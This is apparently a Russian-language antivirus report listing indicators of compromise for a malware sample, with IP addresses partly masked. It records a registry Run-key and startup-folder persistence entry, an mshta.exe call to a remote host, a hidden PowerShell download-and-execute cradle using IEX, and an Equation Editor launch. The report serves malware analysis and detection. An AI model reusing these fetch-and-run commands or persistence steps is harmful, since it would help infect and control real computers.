Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'yEpAQ' = 'C:\lnopru\yEpAQB\yEpAQBHYU.vbs'
- %APPDATA%\microsoft\windows\start menu\programs\startup\systempropertiesadvanced.exe
- '%WINDIR%\syswow64\mshta.exe' http://23.###.162.143:9090/hjf &AAAAAAC
- C:\lnopru\yepaqb\yepaqbhyu.vbs
- C:\lnopru\yepaqb\yepaq.exe
- http://23.###.162.143:9090/hjf via 23.##9.162.143
- http://23.###.162.143:9090/_Incapsula_Resource?SW############################# via 23.##9.162.143
- http://23.###.162.143:9090/get via 23.##9.162.143
- http://www.m9#.net/uploads/15845114731.jpg
- DNS ASK m9#.net
- '%APPDATA%\microsoft\windows\start menu\programs\startup\systempropertiesadvanced.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[<#000#>Net.WebRequest<#000#>]::GetSystemWebProxy();$V.Proxy.Credentials=[<#000#>Net.CredentialCache<#000#>]::DefaultCredentials;IEX($V...' (со скрытым окном)
- '%WINDIR%\syswow64\mshta.exe' http://23.###.162.143:9090/hjf &AAAAAAC' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding